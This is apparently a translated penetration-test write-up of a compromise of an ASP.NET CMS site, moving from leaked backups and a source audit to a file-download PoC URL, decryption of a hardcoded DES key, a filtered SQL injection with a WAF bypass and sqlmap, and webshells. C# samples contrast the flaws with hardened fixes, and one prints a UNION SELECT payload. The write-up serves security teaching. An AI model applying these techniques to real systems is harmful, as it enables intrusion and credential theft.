Title: Practical penetration! How I spent a day on a shoddy site

0x00 Use keywords to get the target source code

One morning I was given a temporary assignment to run a penetration test against a company. Only a main domain name was provided, no subdomains. After opening the target website, I started with information gathering.

Middleware: IIS 8.5

Entering admin, I found that a trailing / was automatically appended.

That means the directory exists, so I blindly guessed a batch of files: login.aspx, default.aspx, main.aspx, etc.

Finally, the backend login page was found at login.aspx. Isn't this begging for a round of weak passwords?

After a few tries, the account was locked.

A familiar start. Since that's how it is, we can only try other methods.

Some information was found in the HTML source of the home page.

Design and production by...? Judging by the domain name that follows, it's a website-building company.

So here's the point: IIS 8.5 + ASP.NET + a site-building system (a CMS).

First step: scan for backup files.

This developer has more than 400 IPs, good enough. Export them in batches with the FOFA query tool.

Then scan for backup files. Here I recommend my friend Brother B's scanner: https://github.com/broken5/WebAliveScan

It can do batch liveness scans and directory scans.

Found a web.zip backup file under several of the sites.

After downloading, I compared it against the target site's files. Basically consistent.

0x01 Got the code, started auditing, and hit a wall many times

Then the audit begins.

A sensitive operation stood out in one interface: WebClient.DownloadFile (remote file download).

Since this method needs an absolute path, that's a headache. But following the relevant parameters, I discovered:

The method is called from another method.

And it is passed Server.MapPath, so you don't need to find an absolute path yourself; the system arranges it for you.

Then construct the POC:

ashx/api.ashx?m=downloadfile&FilePath=asmx.jpg&WebUrl=http://***.cn/

Visit the address.

The file exists, so the vulnerability is proven.

Back to the target address.

It has been fixed; the file does not exist.
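The pattern behind that interface, as an added example (my code, not the CMS's handler; apart from the parameters m=downloadfile, FilePath and WebUrl the page shows, every class, method and directory name here is assumed): a handler that fetches a remote URL and writes it to a caller-chosen path under the web root is an arbitrary file write, and because IIS executes .aspx/.ashx files dropped there, it is remote code execution. The hardened version beside it never lets the caller's string reach the file system: it allow-lists only the extension, generates the name server-side, pins the URL scheme and re-checks the resolved path against the upload root. Targets .NET 6 or later (WebClient still compiles there with an obsolescence warning).

```csharp
using System;
using System.IO;
using System.Linq;
using System.Net;

public static class RemoteFileFetch
{
    // Stand-in for the directory Server.MapPath would resolve to (assumed name).
    static readonly string UploadRoot =
        Path.GetFullPath(Path.Combine(AppContext.BaseDirectory, "upload"));

    // Vulnerable shape: the caller controls both the source URL and the destination file
    // name, including its extension. WebUrl=http://attacker/x.txt&FilePath=x.aspx stores
    // attacker-supplied content as an executable page under the web root.
    public static string DownloadVulnerable(string webUrl, string filePath)
    {
        string target = Path.Combine(UploadRoot, filePath); // like Server.MapPath(filePath)
        using (var wc = new WebClient())
            wc.DownloadFile(webUrl, target);
        return target;
    }

    static readonly string[] AllowedExt = { ".jpg", ".jpeg", ".png", ".gif" };

    // Hardened: decide the destination server-side. Only the extension is taken from the
    // caller, and only if it is allow-listed; the name is a fresh GUID; the URL must be
    // absolute http(s); and the final path is re-checked against UploadRoot.
    public static string ResolveSafeTarget(string webUrl, string requestedName)
    {
        if (!Uri.TryCreate(webUrl, UriKind.Absolute, out Uri uri) ||
            (uri.Scheme != Uri.UriSchemeHttp && uri.Scheme != Uri.UriSchemeHttps))
            throw new ArgumentException("WebUrl must be an absolute http(s) URL");

        // Reject anything that is not a bare file name (traversal, drive letters, UNC paths).
        if (string.IsNullOrEmpty(requestedName) || Path.GetFileName(requestedName) != requestedName)
            throw new ArgumentException("FilePath must be a bare file name");

        string ext = Path.GetExtension(requestedName).ToLowerInvariant();
        if (!AllowedExt.Contains(ext))
            throw new ArgumentException("extension not allowed: " + ext);

        string full = Path.GetFullPath(Path.Combine(UploadRoot, Guid.NewGuid().ToString("N") + ext));
        if (!full.StartsWith(UploadRoot + Path.DirectorySeparatorChar, StringComparison.OrdinalIgnoreCase))
            throw new InvalidOperationException("resolved path left the upload root");
        return full;
    }

    public static void Main()
    {
        // Constructed inputs; nothing is downloaded here, only the path decision is exercised.
        Console.WriteLine("accepted: " + ResolveSafeTarget("http://example.com/a.jpg", "asmx.jpg"));
        foreach (var bad in new[] { "shell.aspx", "..\\web.config", "x.jpg;.aspx", "" })
        {
            try { ResolveSafeTarget("http://example.com/a.jpg", bad); Console.WriteLine("accepted?! " + bad); }
            catch (ArgumentException e) { Console.WriteLine("rejected '" + bad + "': " + e.Message); }
        }
        try { ResolveSafeTarget("file:///C:/Windows/win.ini", "a.jpg"); }
        catch (ArgumentException e) { Console.WriteLine("rejected file URL: " + e.Message); }
    }
}
```

The GUID name is the important part: an extension check alone would still trust the rest of FilePath, and a traversal or a second extension in the name would go straight to the file system. The scheme check also stops the handler being pointed at file: or other local resources.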

Going back to the code, the audit turned up multiple vulnerabilities in other interfaces too. For example, the UEditor remote image-fetch vulnerability.

File renaming can get a shell.

However, these interfaces require login.

That's a headache, so I planned to look for SQL injection in interfaces that don't require login.

Finally, SQL string concatenation was found in one place.

But here the IsSafeSqlString check is called.

Common symbols are basically all blocked.

0x02 Take down the developer, find the general account, and reverse the encryption and decryption algorithm

Since they all use the same website-building program, I suspected the program has a built-in account.

So I prepared to use the vulnerabilities I had just audited, starting with other sites running the same program.

Finally, I successfully got a webshell on one site.

Check the relevant information.

It turned out to be the vendor's demonstration site group, storing the source code of all the developer's sites.

There should be many demo environments from the development process; presumably every customer has one.

Browsing through the server, I found the demo site for the target site.

There are zip website backups and SQL database backups in the root directory.

If the target site was migrated directly, the backend account and password should be the same.

Download its SQL file and search for relevant information.

Found the SQL statements inserting the account. Its password is encrypted.

cmd5 couldn't crack it; looking at the ciphertext, it is 33 characters long.

However, during login the password is transmitted RSA-encrypted, while what the backend actually stores is a 33-character md5-style value.

Since I had the source code, I tracked down the login method.

After the password is passed in, CommFun.EnPwd is called to encrypt it.

Tracking the EnPwd method:

You can see the incoming password is RSA-encrypted: RSA decryption is done first, then DES encryption.

Track the DESEncrypt.Encrypt method.

This is a wrapper around the Encrypt method that passes in the encryption key.

Its core encryption method is as follows:

And in the same class, a decryption method is also defined.

With the encryption method, decryption method and key obtained, you just need to pull them out and call them separately.

Decrypt the ciphertext and get the result.
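To make the lesson of this section concrete, an added example (my code, not the CMS's DESEncrypt class, whose key, mode and output encoding the page does not show; the 8-byte key, CBC mode, key-as-IV and hex output are assumptions): a password store built on reversible DES with a key compiled into the application is exactly as secret as the source code, which here leaked through web.zip. Beside it is the shape a password store should have: a salted, slow, one-way PBKDF2 hash checked with a constant-time compare, which gives an attacker holding the source and the database nothing to "decrypt". Needs .NET 6 or later for Rfc2898DeriveBytes.Pbkdf2 and RandomNumberGenerator.GetBytes, and a platform whose crypto backend still offers single DES (Windows, or OpenSSL with the legacy provider).

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

// Weak pattern: reversible DES with a key compiled into the application (hypothetical key value).
public static class DesPasswordStore
{
    const string HardcodedKey = "K3y!2020";   // 8 ASCII bytes = one DES key

    static DES NewDes()
    {
        var des = DES.Create();
        byte[] key = Encoding.ASCII.GetBytes(HardcodedKey);
        des.Key = key;
        des.IV = key;                   // key reused as IV, a common shortcut in such wrappers
        des.Mode = CipherMode.CBC;
        des.Padding = PaddingMode.PKCS7;
        return des;
    }

    public static string Encrypt(string plaintext)
    {
        using (var des = NewDes())
        using (var enc = des.CreateEncryptor())
        {
            byte[] input = Encoding.UTF8.GetBytes(plaintext);
            return Convert.ToHexString(enc.TransformFinalBlock(input, 0, input.Length));
        }
    }

    // The "decryption method" sitting next to Encrypt: with the key from the source, every
    // stored value in the leaked SQL dump opens.
    public static string Decrypt(string hex)
    {
        byte[] cipher = Convert.FromHexString(hex);
        using (var des = NewDes())
        using (var dec = des.CreateDecryptor())
            return Encoding.UTF8.GetString(dec.TransformFinalBlock(cipher, 0, cipher.Length));
    }
}

// Hardened pattern: salted, slow, one-way. Nothing in the source or the database recovers the password.
public static class HashedPasswordStore
{
    const int SaltSize = 16, HashSize = 32, Iterations = 100_000;

    public static string Hash(string password)
    {
        byte[] salt = RandomNumberGenerator.GetBytes(SaltSize);
        byte[] hash = Rfc2898DeriveBytes.Pbkdf2(password, salt, Iterations, HashAlgorithmName.SHA256, HashSize);
        return $"{Iterations}.{Convert.ToBase64String(salt)}.{Convert.ToBase64String(hash)}";
    }

    public static bool Verify(string password, string stored)
    {
        string[] parts = stored.Split('.');
        if (parts.Length != 3) return false;
        int iterations = int.Parse(parts[0]);
        byte[] salt = Convert.FromBase64String(parts[1]);
        byte[] expected = Convert.FromBase64String(parts[2]);
        byte[] actual = Rfc2898DeriveBytes.Pbkdf2(password, salt, iterations, HashAlgorithmName.SHA256, expected.Length);
        return CryptographicOperations.FixedTimeEquals(actual, expected);   // no early-exit timing leak
    }
}

public static class Program
{
    public static void Main()
    {
        string ct = DesPasswordStore.Encrypt("Admin@123");           // constructed sample password
        Console.WriteLine("DES ciphertext in DB:  " + ct);
        Console.WriteLine("Recovered from source: " + DesPasswordStore.Decrypt(ct));

        string rec = HashedPasswordStore.Hash("Admin@123");
        Console.WriteLine("PBKDF2 record:         " + rec);
        Console.WriteLine("Verify right password: " + HashedPasswordStore.Verify("Admin@123", rec));
        Console.WriteLine("Verify wrong password: " + HashedPasswordStore.Verify("admin", rec));
    }
}
```

The RSA layer on the login request changes nothing here: it protects the password in transit, but the server decrypts it and then stores a reversible DES value, so whoever has the DES key has every account.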

Try to log in.

I worked hard for a long time, and it was all in vain.

0x03 A turn for the better: winning the target shell

It was already 4 pm with still no progress, so I got ready to try bypassing the SQL filter.

At this point, I found a SQL injection point.

A method receives two parameters but only filters one of them.
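A reconstruction of that defect, as an added example (my code, not the CMS's; table, column, method and parameter names are assumed, and the IsSafeSqlString body is a generic blacklist standing in for the real one, whose rules the page does not show): the check is applied to the first parameter while the second is concatenated straight into the query, so the filter protects nothing. The parameterised command underneath closes it for both. Uses System.Data.SqlClient; on .NET Core add the System.Data.SqlClient or Microsoft.Data.SqlClient package.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class NewsSearch
{
    // Generic blacklist standing in for the CMS's IsSafeSqlString (assumed rules).
    static readonly Regex UnsafeSql = new Regex(
        @"['""\-;]|/\*|\b(select|union|insert|update|delete|drop|exec|declare|xp_\w+)\b",
        RegexOptions.IgnoreCase);

    public static bool IsSafeSqlString(string s) => s != null && !UnsafeSql.IsMatch(s);

    // Vulnerable: classId is checked, keyword is concatenated unchecked.
    public static string BuildVulnerableSql(string classId, string keyword)
    {
        if (!IsSafeSqlString(classId))
            throw new ArgumentException("classId rejected by IsSafeSqlString");
        return "SELECT Id, Title FROM News WHERE ClassId = '" + classId +
               "' AND Title LIKE '%" + keyword + "%'";
    }

    // Hardened: every user-controlled value travels as a typed parameter; the SQL text is constant.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, int classId, string keyword)
    {
        var cmd = new SqlCommand(
            "SELECT Id, Title FROM News WHERE ClassId = @classId AND Title LIKE @pattern", conn);
        cmd.Parameters.Add("@classId", SqlDbType.Int).Value = classId;
        // Escape LIKE wildcards so a user cannot widen the match, then wrap in %.
        string escaped = keyword.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = "%" + escaped + "%";
        return cmd;
    }

    public static void Main()
    {
        // Constructed payload, in the style of what sqlmap sends for the unfiltered parameter.
        string payload = "' UNION SELECT UserName, Password FROM Admin --";

        try { BuildVulnerableSql(payload, "news"); }
        catch (ArgumentException e) { Console.WriteLine("in classId: " + e.Message); }

        // Same payload in the second parameter goes straight through.
        Console.WriteLine("in keyword: " + BuildVulnerableSql("1", payload));

        using (var conn = new SqlConnection("Server=.;Database=cms;Integrated Security=true"))
        {
            var cmd = BuildSafeCommand(conn, 1, payload);   // nothing is executed; no connection is opened
            Console.WriteLine("safe text:  " + cmd.CommandText);
            Console.WriteLine("@pattern =  " + cmd.Parameters["@pattern"].Value);
        }
    }
}
```

The second line of output shows why a per-parameter blacklist is the wrong tool: the resulting statement is `... LIKE '%' UNION SELECT UserName, Password FROM Admin --%'`, and the comment marker swallows the trailing quote. With parameters the payload is just a search string the database never parses as SQL.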

Test it on the target website.

Injection confirmed; the WAF was successfully bypassed by padding with junk parameters.

Run it through sqlmap with peace of mind, and get the system account and password.

Decrypt the obtained ciphertext to get the result.

Try to log in. This time it works!

Finally in!

The earlier audit had found many vulnerable interfaces, and now I'm logged in. Wouldn't getting a shell be a given?

Take it straight away with UEditor.

Shell obtained.

0x04 Summary

1. Appending admin to the target URL shows the management backend; the CMS information is found at the bottom of the page.
2. Bulk search for other websites running the same CMS via FOFA: body="xxxx system" && country="CN"
3. Batch export of the matching website URLs with the FOFA query tool.
4. Batch sensitive-directory scan of the exported URLs with WebAliveScan; one of the websites leaked a source-code archive.
5. Local code audit of the website source, which found: an arbitrary file download vulnerability that needs no login, ashx/api.ashx?m=downloadfile&FilePath=asmx.jpg&WebUrl=http://***.cn/; a UEditor remote file download vulnerability, which needs login; and a SQL injection vulnerability, which needs login and is filtered.
6. Got a webshell on one of the URLs through the arbitrary file download vulnerability, and found it was the vendor's demonstration site-group system.
7. Through the webshell, found zip website backups and SQL database backups in the root directory of every website in the site group; the SQL contains the inserted username and password (password is 33 characters). Logins across the site group basically use the same username and password.
8. Source code analysis showed the login is encrypted with RSA + DES, and the encryption method and KEY value are in the source code.
9. Wrote a decryption routine from the encryption method in the source and decrypted the HASH value, but login was impossible.
10. Source code audit found another SQL injection. Here the WAF intercepted; it was bypassed by padding with junk data, and the account was dumped with sqlmap. The password hash was decrypted with the above method, finally giving the plaintext password.
11. Logged in to the system with the obtained username and password, then obtained a webshell on the target system through the UEditor remote file download.

Original article: https://xz.aliyun.com/t/8375
